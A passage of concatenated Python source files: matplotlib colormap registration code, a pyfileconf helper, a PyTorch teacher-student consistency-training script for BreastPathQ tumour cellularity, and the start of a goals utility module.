[-0.623529, 0.18302, 0.632034, 0.787722],
[-0.498039, 0.117909, 0.484134, 0.713825],
[-0.372549, 0.0507239, 0.335979, 0.654741],
[-0.247059, 0, 0.209874, 0.511832],
[-0.121569, 0, 0.114689, 0.28935],
[0.00392157, 0.0157519, 0.00332021, 4.55569e-08],
[0.129412, 0.312914, 0, 0],
[0.254902, 0.520865, 0, 0],
[0.380392, 0.680105, 0.15255, 0.0025996],
[0.505882, 0.785109, 0.339479, 0.000797922],
[0.631373, 0.857354, 0.522494, 0],
[0.756863, 0.910974, 0.699774, 0],
[0.882353, 0.951921, 0.842817, 0.478545],
[1, 0.881371, 0.912178, 0.818099]], float)
colorCount = 255
colorList = np.ones((colorCount, 4), float)
x = colorArray[:, 0]
for cIndex in range(3):
colorList[:, cIndex] = np.interp(
np.linspace(-1., 1., colorCount),
x, colorArray[:, cIndex + 1])
colorMap = cols.LinearSegmentedColormap.from_list(
name, colorList, N=255)
_register_colormap_and_reverse(name, colorMap)
name = 'BuOr'
colors1 = plt.cm.PuOr(np.linspace(0., 1, 256))
colors2 = plt.cm.RdBu(np.linspace(0, 1, 256))
# combine them and build a new colormap, just the orange from the first
# and the blue from the second
colorList = np.vstack((colors1[0:128, :], colors2[128:256, :]))
# reverse the order
colorList = colorList[::-1, :]
colorMap = cols.LinearSegmentedColormap.from_list(name, colorList)
_register_colormap_and_reverse(name, colorMap)
name = 'Maximenko'
colorArray = np.array([
[-1, 0., 0.45882352941, 0.76470588235],
[-0.666667, 0., 0.70196078431, 0.90588235294],
[-0.333333, 0.3294117647, 0.87058823529, 1.],
[0., 0.76470588235, 0.94509803921, 0.98039215686],
[0.333333, 1., 1., 0.],
[0.666667, 1., 0.29411764705, 0.],
[1, 1., 0., 0.]], float)
colorCount = 255
colorList = np.ones((colorCount, 4), float)
x = colorArray[:, 0]
for cIndex in range(3):
colorList[:, cIndex] = np.interp(
np.linspace(-1., 1., colorCount),
x, colorArray[:, cIndex + 1])
colorMap = cols.LinearSegmentedColormap.from_list(
name, colorList, N=255)
_register_colormap_and_reverse(name, colorMap)
# add the cmocean color maps
mapNames = list(cmocean.cm.cmapnames)
# don't bother with gray (already exists, I think)
mapNames.pop(mapNames.index('gray'))
for mapName in mapNames:
_register_colormap_and_reverse(mapName, getattr(cmocean.cm, mapName))
# add SciVisColor colormaps from
# https://sciviscolor.org/home/colormaps/
for mapName in ['3wave-yellow-grey-blue', '3Wbgy5',
'4wave-grey-red-green-mgreen', '5wave-yellow-brown-blue',
'blue-1', 'blue-3', 'blue-6', 'blue-8', 'blue-orange-div',
'brown-2', 'brown-5', 'brown-8', 'green-1', 'green-4',
'green-7', 'green-8', 'orange-5', 'orange-6',
'orange-green-blue-gray', 'purple-7', 'purple-8', 'red-1',
'red-3', 'red-4', 'yellow-1', 'yellow-7']:
xmlFile = pkg_resources.resource_filename(
__name__, 'SciVisColorColormaps/{}.xml'.format(mapName))
_read_xml_colormap(xmlFile, mapName)
name = 'white_cmo_deep'
# modify cmo.deep to start at white
colors2 = plt.cm.get_cmap('cmo.deep')(np.linspace(0, 1, 224))
colorCount = 32
colors1 = np.ones((colorCount, 4), float)
x = np.linspace(0., 1., colorCount+1)[0:-1]
white = [1., 1., 1., 1.]
for cIndex in range(4):
colors1[:, cIndex] = np.interp(x, [0., 1.],
[white[cIndex], colors2[0, cIndex]])
colors = np.vstack((colors1, colors2))
# generating a smoothly-varying LinearSegmentedColormap
cmap = LinearSegmentedColormap.from_list(name, colors)
_register_colormap_and_reverse(name, cmap)
def _setup_colormap_and_norm(config, configSectionName, suffix=''):
'''
Set up a colormap from the registry
Parameters
----------
config : instance of ConfigParser
the configuration, containing a [plot] section with options that
control plotting
configSectionName : str
name of config section
suffix: str, optional
suffix of colormap related options
Returns
-------
    colormap : str
        new colormap
    norm : ``matplotlib.colors.Normalize``
the norm used to normalize the colormap
ticks : array of float
the tick marks on the colormap
'''
# Authors
# -------
# Xylar Asay-Davis
register_custom_colormaps()
colormap = plt.get_cmap(config.get(configSectionName,
'colormapName{}'.format(suffix)))
normType = config.get(configSectionName, 'normType{}'.format(suffix))
kwargs = config.getExpression(configSectionName,
'normArgs{}'.format(suffix))
if normType == 'symLog':
norm = cols.SymLogNorm(**kwargs)
elif normType == 'log':
norm = cols.LogNorm(**kwargs)
elif normType == 'linear':
norm = cols.Normalize(**kwargs)
else:
raise ValueError('Unsupported norm type {} in section {}'.format(
normType, configSectionName))
try:
ticks = config.getExpression(
configSectionName, 'colorbarTicks{}'.format(suffix),
usenumpyfunc=True)
except(configparser.NoOptionError):
ticks = None
return (colormap, norm, ticks)
def _setup_indexed_colormap(config, configSectionName, suffix=''):
'''
Set up a colormap from the registry
Parameters
----------
config : instance of ConfigParser
the configuration, containing a [plot] section with options that
control plotting
configSectionName : str
name of config section
suffix: str, optional
suffix of colormap related options
Returns
-------
    colormap : str
        new colormap
    norm : ``matplotlib.colors.Normalize``
the norm used to normalize the colormap
ticks : array of float
the tick marks on the colormap
'''
# Authors
# -------
# Xylar Asay-Davis, Milena Veneziani, Greg Streletz
colormap = plt.get_cmap(config.get(configSectionName,
'colormapName{}'.format(suffix)))
indices = config.getExpression(configSectionName,
'colormapIndices{}'.format(suffix),
usenumpyfunc=True)
try:
levels = config.getExpression(
configSectionName, 'colorbarLevels{}'.format(suffix),
usenumpyfunc=True)
except(configparser.NoOptionError):
levels = None
if levels is not None:
# set under/over values based on the first/last indices in the colormap
underColor = colormap(indices[0])
overColor = colormap(indices[-1])
if len(levels) + 1 == len(indices):
# we have 2 extra values for the under/over so make the colormap
# without these values
indices = indices[1:-1]
elif len(levels) - 1 != len(indices):
# indices list must be either one element shorter
# or one element longer than colorbarLevels list
raise ValueError('length mismatch between indices and '
'colorbarLevels')
colormap = cols.ListedColormap(colormap(indices),
'colormapName{}'.format(suffix))
colormap.set_under(underColor)
colormap.set_over(overColor)
norm = cols.BoundaryNorm(levels, colormap.N)
try:
ticks = config.getExpression(
configSectionName, 'colorbarTicks{}'.format(suffix),
usenumpyfunc=True)
except(configparser.NoOptionError):
ticks = levels
return (colormap, norm, levels, ticks)
def _read_xml_colormap(xmlFile, mapName):
'''Read in an XML colormap'''
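    # Expected layout of the XML file (inferred from the parsing below):
    #   <ColorMaps>
    #     <ColorMap name="...">
    #       <Point x="0.0" r="0.0" g="0.0" b="1.0"/>
    #       <Point x="1.0" r="1.0" g="0.0" b="0.0"/>
    #     </ColorMap>
    #   </ColorMaps>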
xml = ET.parse(xmlFile)
root = xml.getroot()
colormap = root.findall('ColorMap')
if len(colormap) > 0:
colormap = colormap[0]
colorDict = {'red': [], 'green': [], 'blue': []}
for point in colormap.findall('Point'):
x = float(point.get('x'))
color = [float(point.get('r')), float(point.get('g')),
float(point.get('b'))]
colorDict['red'].append((x, color[0], color[0]))
colorDict['green'].append((x, color[1], color[1]))
colorDict['blue'].append((x, color[2], color[2]))
cmap = LinearSegmentedColormap(mapName, colorDict, 256)
_register_colormap_and_reverse(mapName, cmap)
def _register_colormap_and_reverse(mapName, cmap):
if mapName not in plt.colormaps():
plt.register_cmap(mapName, cmap)
plt.register_cmap('{}_r'.format(mapName), cmap.reversed())
def _plot_color_gradients():
'''from https://matplotlib.org/tutorials/colors/colormaps.html'''
cmap_list = [m for m in plt.colormaps() if not m.endswith("_r")]
gradient = np.linspace(0, 1, 256)
gradient = np.vstack((gradient, gradient))
nrows = len(cmap_list)
fig, axes = plt.subplots(figsize=(7.2, 0.25 * nrows), nrows=nrows)
fig.subplots_adjust(top=0.99, bottom=0.01, left=0.35, right=0.99)
for ax, name in zip(axes, cmap_list):
ax.imshow(gradient, aspect='auto', cmap=plt.get_cmap(name))
pos = list(ax.get_position().bounds)
x_text = pos[0] - 0.01
y_text = pos[1] + pos[3] / 2.
fig.text(x_text, y_text, name, va='center', ha='right', fontsize=10)
# Turn off *all* ticks & spines, not just the ones with colormaps.
for ax in axes:
ax.set_axis_off()
plt.savefig('colormaps.png', dpi=100)
# vim: foldmethod=marker ai ts=4 sts=4 et sw=4 ft=python
|
python
|
from typing import Tuple, Type, List, Dict, Union
from pyfileconf.main import PipelineManager, SpecificClassConfigDict
def get_pipeline_dict_path_and_specific_class_config_dicts_from_manager(manager: PipelineManager
) -> Tuple[
str,
List[SpecificClassConfigDict]
]:
return manager.pipeline_dict_path, manager.specific_class_config_dicts
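# Hypothetical usage sketch (the PipelineManager construction is elided and its
# arguments are placeholders):
#
#   manager = PipelineManager(...)
#   path, class_config_dicts = \
#       get_pipeline_dict_path_and_specific_class_config_dicts_from_manager(manager)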
|
python
|
"""
Task-Specific consistency training on downstream task (BreastPathQ)
"""
import argparse
import os
import time
import random
import numpy as np
from PIL import Image
import cv2
import copy
import pingouin as pg
import statsmodels.api as sm
import pandas as pd
from tqdm import tqdm
import torch.backends.cudnn as cudnn
import torch
from torch.utils.data import Dataset, Subset
import torch.optim as optim
import torch.nn.functional as F
import torch.nn as nn
from util import AverageMeter, plot_confusion_matrix
from collections import OrderedDict
from torchvision import transforms, datasets
from dataset import DatasetBreastPathQ_eval, DatasetBreastPathQ_SSLtrain, DatasetBreastPathQ_Supervised_train, TransformFix
import models.net as net
from albumentations import Compose
from sklearn.metrics import multilabel_confusion_matrix
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
from sklearn.model_selection import StratifiedShuffleSplit
from torch.utils.data.sampler import SubsetRandomSampler
###########
def train(args, model_teacher, model_student, classifier_teacher, classifier_student, labeled_train_loader, unlabeled_train_loader, optimizer, epoch):
"""
Consistency training
"""
model_teacher.eval()
classifier_teacher.eval()
model_student.train()
classifier_student.train()
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
losses_x = AverageMeter()
losses_u = AverageMeter()
total_feats = []
total_targets = []
end = time.time()
train_loader = zip(labeled_train_loader, unlabeled_train_loader)
for batch_idx, (data_x, data_u) in enumerate(tqdm(train_loader, disable=False)):
# Get inputs and target
inputs_x, targets_x = data_x
inputs_u_w, inputs_u_s = data_u
inputs_x, inputs_u_w, inputs_u_s, targets_x = inputs_x.float(), inputs_u_w.float(), inputs_u_s.float(), targets_x.float()
# Move the variables to Cuda
inputs_x, inputs_u_w, inputs_u_s, targets_x = inputs_x.cuda(), inputs_u_w.cuda(), inputs_u_s.cuda(), targets_x.cuda()
# Compute output
inputs_x = inputs_x.reshape(-1, 3, 256, 256) #Reshape
# Compute pseudolabels for weak_unlabeled images using the teacher model
with torch.no_grad():
feat_u_w = model_teacher(inputs_u_w) # weak unlabeled data
logits_u_w = classifier_teacher(feat_u_w)
# Compute output for labeled and strong_unlabeled images using the student model
inputs = torch.cat((inputs_x, inputs_u_s))
feats = model_student(inputs)
logits = classifier_student(feats)
batch_size = inputs_x.shape[0]
logits_x = logits[:batch_size] #labeled data
logits_u_s = logits[batch_size:] # unlabeled data
del logits
# Compute loss
Supervised_loss = F.mse_loss(logits_x, targets_x.view(-1, 1), reduction='mean')
Consistency_loss = F.mse_loss(logits_u_w, logits_u_s, reduction='mean')
final_loss = Supervised_loss + args.lambda_u * Consistency_loss
# compute gradient and do SGD step #############
optimizer.zero_grad()
final_loss.backward()
optimizer.step()
# compute loss and accuracy ####################
losses.update(final_loss.item(), batch_size)
losses_x.update(Supervised_loss.item(), batch_size)
losses_u.update(Consistency_loss.item(), batch_size)
# Save features
total_feats.append(feats)
total_targets.append(targets_x)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print statistics and write summary every N batch
if (batch_idx + 1) % args.print_freq == 0:
print('Train: [{0}][{1}/{2}]\t'
'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'DT {data_time.val:.3f} ({data_time.avg:.3f})\t'
'final_loss {final_loss.val:.3f} ({final_loss.avg:.3f})\t'
'Supervised_loss {Supervised_loss.val:.3f} ({Supervised_loss.avg:.3f})\t'
'Consistency_loss {Consistency_loss.val:.3f} ({Consistency_loss.avg:.3f})'.format(epoch, batch_idx + 1, len(labeled_train_loader), batch_time=batch_time,
data_time=data_time, final_loss=losses, Supervised_loss=losses_x, Consistency_loss=losses_u))
final_feats = torch.cat(total_feats).detach()
final_targets = torch.cat(total_targets).detach()
return losses.avg, losses_x.avg, losses_u.avg, final_feats, final_targets
def validate(args, model_student, classifier_student, val_loader, epoch):
# switch to evaluate mode
model_student.eval()
classifier_student.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
with torch.no_grad():
end = time.time()
for batch_idx, (input, target) in enumerate(tqdm(val_loader, disable=False)):
# Get inputs and target
input, target = input.float(), target.float()
# Move the variables to Cuda
input, target = input.cuda(), target.cuda()
# compute output ###############################
feats = model_student(input)
output = classifier_student(feats)
loss = F.mse_loss(output, target.view(-1, 1), reduction='mean')
# compute loss and accuracy ####################
batch_size = target.size(0)
losses.update(loss.item(), batch_size)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print statistics and write summary every N batch
if (batch_idx + 1) % args.print_freq == 0:
print('Val: [{0}][{1}/{2}]\t'
'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'DT {data_time.val:.3f} ({data_time.avg:.3f})\t'
'loss {loss.val:.3f} ({loss.avg:.3f})'.format(epoch, batch_idx + 1, len(val_loader),
batch_time=batch_time, data_time=data_time, loss=losses))
return losses.avg
def test(args, model_student, classifier_student, test_loader):
# switch to evaluate mode
model_student.eval()
classifier_student.eval()
batch_time = AverageMeter()
losses = AverageMeter()
total_feats = []
total_output = []
total_targetA = []
total_targetB = []
with torch.no_grad():
end = time.time()
for batch_idx, (input, targetA, targetB) in enumerate(tqdm(test_loader, disable=False)):
# Get inputs and target
input, targetA, targetB = input.float(), targetA.float(), targetB.float()
# Move the variables to Cuda
input, targetA, targetB = input.cuda(), targetA.cuda(), targetB.cuda()
# compute output ###############################
feats = model_student(input)
output = classifier_student(feats)
#######
loss = F.mse_loss(output, targetA.view(-1, 1), reduction='mean')
# compute loss and accuracy
batch_size = targetA.size(0)
losses.update(loss.item(), batch_size)
# Save pred, target to calculate metrics
output = output.view(-1, 1).reshape(-1, )
total_output.append(output)
total_feats.append(feats)
total_targetA.append(targetA)
total_targetB.append(targetB)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print statistics and write summary every N batch
if (batch_idx + 1) % args.print_freq == 0:
print('Test: [{0}/{1}]\t'
'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'loss {loss.val:.3f} ({loss.avg:.3f})'.format(
batch_idx, len(test_loader), batch_time=batch_time, loss=losses))
# Pred and target for performance metrics
final_outputs = torch.cat(total_output).to('cpu')
final_feats = torch.cat(total_feats).to('cpu')
final_targetsA = torch.cat(total_targetA).to('cpu')
final_targetsB = torch.cat(total_targetB).to('cpu')
return final_outputs, final_feats, final_targetsA, final_targetsB
def parse_args():
parser = argparse.ArgumentParser('Argument for BreastPathQ - Consistency training/Evaluation')
parser.add_argument('--print_freq', type=int, default=10, help='print frequency')
parser.add_argument('--save_freq', type=int, default=10, help='save frequency')
parser.add_argument('--gpu', default='0', help='GPU id to use.')
parser.add_argument('--num_workers', type=int, default=8, help='num of workers to use.')
parser.add_argument('--seed', type=int, default=42, help='seed for initializing training.')
# model definition
parser.add_argument('--model', type=str, default='resnet18', help='choice of network architecture.')
parser.add_argument('--mode', type=str, default='fine-tuning', help='fine-tuning/evaluation')
parser.add_argument('--modules_teacher', type=int, default=64,
help='number of modules to freeze in the fine-tuned teacher model: 0 = full fine-tune, 60 = fine-tune only the FC layer, 64 = freeze the full ResNet18 network')
parser.add_argument('--modules_student', type=int, default=60,
help='number of modules to freeze when fine-tuning the student model: 0 = full fine-tune, 60 = fine-tune only the FC layer (ResNet18)')
parser.add_argument('--num_classes', type=int, default=1, help='# of classes.')
parser.add_argument('--num_epoch', type=int, default=90, help='epochs to train for.')
parser.add_argument('--batch_size', type=int, default=4, help='batch_size - 48/64.')
parser.add_argument('--mu', default=7, type=int, help='coefficient of unlabeled batch size - 7')
parser.add_argument('--NAug', default=7, type=int, help='No of Augmentations for strong unlabeled data')
parser.add_argument('--lr', default=0.0001, type=float, help='learning rate. - 1e-4(Adam)')
parser.add_argument('--weight_decay', default=1e-4, type=float,
help='weight decay/weights regularizer for sgd. - 1e-4')
parser.add_argument('--beta1', default=0.9, type=float, help='momentum for sgd, beta1 for adam.')
parser.add_argument('--beta2', default=0.999, type=float, help=' beta2 for adam.')
parser.add_argument('--lambda_u', default=1, type=float, help='coefficient of unlabeled loss')
# Consistency training
parser.add_argument('--model_path_finetune', type=str,
default='/home/csrinidhi/SSL_Eval/Save_Results/SSL/0.1/',
help='path to load the SSL fine-tuned model to initialize the teacher and student networks for consistency training')
parser.add_argument('--model_save_pth', type=str,
default='/home/srinidhi/Research/Code/SSL_Resolution/Save_Results/Results/Cellularity/Results/', help='path to save consistency trained model')
parser.add_argument('--save_loss', type=str,
default='/home/srinidhi/Research/Code/SSL_Resolution/Save_Results/Results/Cellularity/Results/',
help='path to save loss and other performance metrics')
# Testing
parser.add_argument('--model_path_eval', type=str,
default='/home/srinidhi/Research/Code/SSL_Resolution/Save_Results/Results/Cellularity/Results/',
help='path to load consistency trained model')
# Data paths
parser.add_argument('--train_image_pth',
default='/home/srinidhi/Research/Data/Cellularity/Tumor_Cellularity_Compare/TrainSet/')
parser.add_argument('--test_image_pth',
default='/home/srinidhi/Research/Data/Cellularity/Tumor_Cellularity_Compare/')
parser.add_argument('--validation_split', default=0.2, type=float,
help='portion of the data that will be used for validation')
parser.add_argument('--labeled_train', default=0.1, type=float,
help='portion of the train data with labels - 1(full), 0.1/0.25/0.5')
# Tiling parameters
parser.add_argument('--image_size', default=256, type=int, help='patch size width 256')
args = parser.parse_args()
return args
def main():
# parse the args
args = parse_args()
# Set the data loaders (train, val, test)
### BreastPathQ ##################
if args.mode == 'fine-tuning':
# Train set
transform_train = transforms.Compose([]) # None
train_labeled_dataset = DatasetBreastPathQ_Supervised_train(args.train_image_pth, args.image_size, transform=transform_train)
train_unlabeled_dataset = DatasetBreastPathQ_SSLtrain(args.train_image_pth, transform=TransformFix(args.image_size, args.NAug))
# Validation set
transform_val = transforms.Compose([transforms.Resize(size=args.image_size)])
val_dataset = DatasetBreastPathQ_SSLtrain(args.train_image_pth, transform=transform_val)
# train and validation split
num_train = len(train_labeled_dataset.datalist)
indices = list(range(num_train))
split = int(np.floor(args.validation_split * num_train))
np.random.shuffle(indices)
train_idx, val_idx = indices[split:], indices[:split]
#### Semi-Supervised Split (10, 25, 50, 100)
labeled_train_idx = np.random.choice(train_idx, int(args.labeled_train * len(train_idx)))
unlabeled_train_sampler = SubsetRandomSampler(train_idx)
labeled_train_sampler = SubsetRandomSampler(labeled_train_idx)
val_sampler = SubsetRandomSampler(val_idx)
# Data loaders
labeled_train_loader = torch.utils.data.DataLoader(train_labeled_dataset, batch_size=args.batch_size, sampler=labeled_train_sampler,
shuffle=True if labeled_train_sampler is None else False, num_workers=args.num_workers, pin_memory=True, drop_last=True)
unlabeled_train_loader = torch.utils.data.DataLoader(train_unlabeled_dataset, batch_size=args.batch_size*args.mu, sampler=unlabeled_train_sampler,
shuffle=True if unlabeled_train_sampler is None else False, num_workers=args.num_workers, pin_memory=True, drop_last=True)
val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, sampler=val_sampler,
shuffle=False, num_workers=args.num_workers, pin_memory=True, drop_last=False)
# number of samples
num_label_data = len(labeled_train_sampler)
print('number of labeled training samples: {}'.format(num_label_data))
num_unlabel_data = len(unlabeled_train_sampler)
print('number of unlabeled training samples: {}'.format(num_unlabel_data))
num_val_data = len(val_sampler)
print('number of validation samples: {}'.format(num_val_data))
elif args.mode == 'evaluation':
# Test set
test_transforms = transforms.Compose([transforms.Resize(size=args.image_size)])
test_dataset = DatasetBreastPathQ_eval(args.test_image_pth, args.image_size, test_transforms)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False,
num_workers=args.num_workers, pin_memory=True)
# number of samples
n_data = len(test_dataset)
print('number of testing samples: {}'.format(n_data))
else:
raise NotImplementedError('invalid mode {}'.format(args.mode))
########################################
# set the model
if args.model == 'resnet18':
model_teacher = net.TripletNet_Finetune(args.model)
model_student = net.TripletNet_Finetune(args.model)
classifier_teacher = net.FinetuneResNet(args.num_classes)
classifier_student = net.FinetuneResNet(args.num_classes)
if args.mode == 'fine-tuning':
###### Initialize both teacher and student networks with the fine-tuned SSL model ###############
# Load model
state_dict = torch.load(args.model_path_finetune)
# Load fine-tuned model
model_teacher.load_state_dict(state_dict['model'])
model_student.load_state_dict(state_dict['model'])
# Load fine-tuned classifier
classifier_teacher.load_state_dict(state_dict['classifier'])
classifier_student.load_state_dict(state_dict['classifier'])
################# Freeze Teacher model (Entire network) ####################
# look at the contents of the teacher model and freeze it
idx = 0
for layer_name, param in model_teacher.named_parameters():
print(layer_name, '-->', idx)
idx += 1
# Freeze the teacher model
for name, param in enumerate(model_teacher.named_parameters()):
if name < args.modules_teacher: # number of layers (modules) to be frozen
print("module", name, "was frozen")
param = param[1]
param.requires_grad = False
else:
print("module", name, "was not frozen")
param = param[1]
param.requires_grad = True
############## Freeze Student model (Except last FC layer) #########################
# look at the contents of the student model and freeze it
idx = 0
for layer_name, param in model_student.named_parameters():
print(layer_name, '-->', idx)
idx += 1
# Freeze the student model
for name, param in enumerate(model_student.named_parameters()):
if name < args.modules_student: # number of layers (modules) to be frozen
print("module", name, "was frozen")
param = param[1]
param.requires_grad = False
else:
print("module", name, "was not frozen")
param = param[1]
param.requires_grad = True
elif args.mode == 'evaluation':
# Load fine-tuned model
state = torch.load(args.model_path_eval)
# create new OrderedDict that does not contain `module.`
new_state_dict = OrderedDict()
for k, v in state['model_student'].items():
name = k[7:] # remove `module.`
new_state_dict[name] = v
model_student.load_state_dict(new_state_dict)
# create new OrderedDict that does not contain `module.`
new_state_dict_cls = OrderedDict()
for k, v in state['classifier_student'].items():
name = k[7:] # remove `module.`
new_state_dict_cls[name] = v
classifier_student.load_state_dict(new_state_dict_cls)
else:
raise NotImplementedError('invalid training {}'.format(args.mode))
else:
raise NotImplementedError('model not supported {}'.format(args.model))
# Load model to CUDA
if torch.cuda.is_available():
model_teacher = torch.nn.DataParallel(model_teacher)
model_student = torch.nn.DataParallel(model_student)
classifier_teacher = torch.nn.DataParallel(classifier_teacher)
classifier_student = torch.nn.DataParallel(classifier_student)
cudnn.benchmark = True
# Optimiser & scheduler
optimizer = optim.Adam(filter(lambda p: p.requires_grad, list(model_student.parameters()) + list(classifier_student.parameters())), lr=args.lr, betas=(args.beta1, args.beta2), weight_decay=args.weight_decay)
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[30, 60], gamma=0.1)
# Training Model
start_epoch = 1
prev_best_val_loss = float('inf')
# Start log (writing into XL sheet)
with open(os.path.join(args.save_loss, 'fine_tuned_results.csv'), 'w') as f:
f.write('epoch, train_loss, train_losses_x, train_losses_u, val_loss\n')
# Routine
for epoch in range(start_epoch, args.num_epoch + 1):
if args.mode == 'fine-tuning':
print("==> fine-tuning the pretrained SSL model...")
time_start = time.time()
train_losses, train_losses_x, train_losses_u, final_feats, final_targets = train(args, model_teacher, model_student, classifier_teacher, classifier_student, labeled_train_loader, unlabeled_train_loader, optimizer, epoch)
print('Epoch time: {:.2f} s.'.format(time.time() - time_start))
print("==> validating the fine-tuned model...")
val_losses = validate(args, model_student, classifier_student, val_loader, epoch)
# Log results
with open(os.path.join(args.save_loss, 'fine_tuned_results.csv'), 'a') as f:
f.write('%03d,%0.6f,%0.6f,%0.6f,%0.6f,\n' % ((epoch + 1), train_losses, train_losses_x, train_losses_u, val_losses))
# adjust learning rate; note that scheduler.step() should be called after validate()
scheduler.step()
# Iterative training: Use the student as a teacher after every epoch
model_teacher = copy.deepcopy(model_student)
classifier_teacher = copy.deepcopy(classifier_student)
# Save model every 10 epochs
if epoch % args.save_freq == 0:
print('==> Saving...')
state = {
'args': args,
'model_student': model_student.state_dict(),
'model_teacher': model_teacher.state_dict(),
'classifier_teacher': classifier_teacher.state_dict(),
'classifier_student': classifier_student.state_dict(),
'optimizer': optimizer.state_dict(),
'epoch': epoch,
'train_loss': train_losses,
'train_losses_x': train_losses_x,
'train_losses_u': train_losses_u,
}
torch.save(state, '{}/fine_CR_trained_model_{}.pt'.format(args.model_save_pth, epoch))
# help release GPU memory
del state
torch.cuda.empty_cache()
# Save model for the best val
if (val_losses < prev_best_val_loss) and (epoch > 1):
print('==> Saving...')
state = {
'args': args,
'model_student': model_student.state_dict(),
'model_teacher': model_teacher.state_dict(),
'classifier_teacher': classifier_teacher.state_dict(),
'classifier_student': classifier_student.state_dict(),
'optimizer': optimizer.state_dict(),
'epoch': epoch,
'train_loss': train_losses,
'train_losses_x': train_losses_x,
'train_losses_u': train_losses_u,
}
torch.save(state, '{}/best_CR_trained_model_{}.pt'.format(args.model_save_pth, epoch))
prev_best_val_loss = val_losses
# help release GPU memory
del state
torch.cuda.empty_cache()
elif args.mode == 'evaluation':
print("==> testing final test data...")
final_predicitions, final_feats, final_targetsA, final_targetsB = test(args, model_student, classifier_student, test_loader)
final_predicitions = final_predicitions.numpy()
final_targetsA = final_targetsA.numpy()
final_targetsB = final_targetsB.numpy()
# BreastPathQ dataset #######
d = {'targets': np.hstack(
[np.arange(1, len(final_predicitions) + 1, 1), np.arange(1, len(final_predicitions) + 1, 1)]),
'raters': np.hstack([np.tile(np.array(['M']), len(final_predicitions)),
np.tile(np.array(['A']), len(final_predicitions))]),
'scores': np.hstack([final_predicitions, final_targetsA])}
df = pd.DataFrame(data=d)
iccA = pg.intraclass_corr(data=df, targets='targets', raters='raters', ratings='scores')
iccA.to_csv(os.path.join(args.save_loss, 'BreastPathQ_ICC_Eval_2way_MA.csv'))
print(iccA)
d = {'targets': np.hstack(
[np.arange(1, len(final_predicitions) + 1, 1), np.arange(1, len(final_predicitions) + 1, 1)]),
'raters': np.hstack([np.tile(np.array(['M']), len(final_predicitions)),
np.tile(np.array(['B']), len(final_predicitions))]),
'scores': np.hstack([final_predicitions, final_targetsB])}
df = pd.DataFrame(data=d)
iccB = pg.intraclass_corr(data=df, targets='targets', raters='raters', ratings='scores')
iccB.to_csv(os.path.join(args.save_loss, 'BreastPathQ_ICC_Eval_2way_MB.csv'))
print(iccB)
d = {'targets': np.hstack(
[np.arange(1, len(final_targetsA) + 1, 1), np.arange(1, len(final_targetsB) + 1, 1)]),
'raters': np.hstack(
[np.tile(np.array(['A']), len(final_targetsA)), np.tile(np.array(['B']), len(final_targetsB))]),
'scores': np.hstack([final_targetsA, final_targetsB])}
df = pd.DataFrame(data=d)
iccC = pg.intraclass_corr(data=df, targets='targets', raters='raters', ratings='scores')
iccC.to_csv(os.path.join(args.save_loss, 'BreastPathQ_ICC_Eval_2way_AB.csv'))
print(iccC)
# Plots
fig, ax = plt.subplots() # P1 vs automated
ax.scatter(final_targetsA, final_predicitions, edgecolors=(0, 0, 0))
ax.plot([final_targetsA.min(), final_targetsA.max()], [final_targetsA.min(), final_targetsA.max()], 'k--',
lw=2)
ax.set_xlabel('Pathologist1')
ax.set_ylabel('Automated Method')
plt.savefig(os.path.join(args.save_loss, 'BreastPathQ_Eval_2way_MA_plot.png'), dpi=300)
plt.show()
fig, ax = plt.subplots() # P2 vs automated
ax.scatter(final_targetsB, final_predicitions, edgecolors=(0, 0, 0))
ax.plot([final_targetsB.min(), final_targetsB.max()], [final_targetsB.min(), final_targetsB.max()], 'k--',
lw=2)
ax.set_xlabel('Pathologist2')
ax.set_ylabel('Automated Method')
plt.savefig(os.path.join(args.save_loss, 'BreastPathQ_Eval_2way_MB_plot.png'), dpi=300)
plt.show()
fig, ax = plt.subplots() # P1 vs P2
ax.scatter(final_targetsA, final_targetsB, edgecolors=(0, 0, 0))
ax.plot([final_targetsA.min(), final_targetsA.max()], [final_targetsA.min(), final_targetsA.max()], 'k--',
lw=2)
ax.set_xlabel('Pathologist1')
ax.set_ylabel('Pathologist2')
plt.savefig(os.path.join(args.save_loss, 'BreastPathQ_Eval_2way_AB_plot.png'), dpi=300)
plt.show()
# Bland altman plot
fig, ax = plt.subplots(1, figsize=(8, 8))
sm.graphics.mean_diff_plot(final_targetsA, final_predicitions, ax=ax)
plt.savefig(os.path.join(args.save_loss, 'BDPlot_Eval_2way_MA_plot.png'), dpi=300)
plt.show()
fig, ax = plt.subplots(1, figsize=(8, 8))
sm.graphics.mean_diff_plot(final_targetsB, final_predicitions, ax=ax)
plt.savefig(os.path.join(args.save_loss, 'BDPlot_Eval_2way_MB_plot.png'), dpi=300)
plt.show()
fig, ax = plt.subplots(1, figsize=(8, 8))
sm.graphics.mean_diff_plot(final_targetsA, final_targetsB, ax=ax)
plt.savefig(os.path.join(args.save_loss, 'BDPlot_Eval_2way_AB_plot.png'), dpi=300)
plt.show()
else:
raise NotImplementedError('mode not supported {}'.format(args.mode))
if __name__ == "__main__":
args = parse_args()
print(vars(args))
# Force the pytorch to create context on the specific device
os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu)
if args.seed:
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.gpu:
torch.cuda.manual_seed_all(args.seed)
# Main function
main()
|
python
|
from __future__ import absolute_import
import datetime
from .config import get_config_file_paths
from .util import *
# config file path
GOALS_CONFIG_FILE_PATH = get_config_file_paths()['GOALS_CONFIG_FILE_PATH']
GOALS_CONFIG_FOLDER_PATH = get_folder_path_from_file_path(
GOALS_CONFIG_FILE_PATH)
def strike(text):
"""
strikethrough text
:param text:
:return:
"""
return u'\u0336'.join(text) + u'\u0336'
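# Example: strike('done') returns 'd\u0336o\u0336n\u0336e\u0336', which renders as
# struck-through text in terminals that support combining characters.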
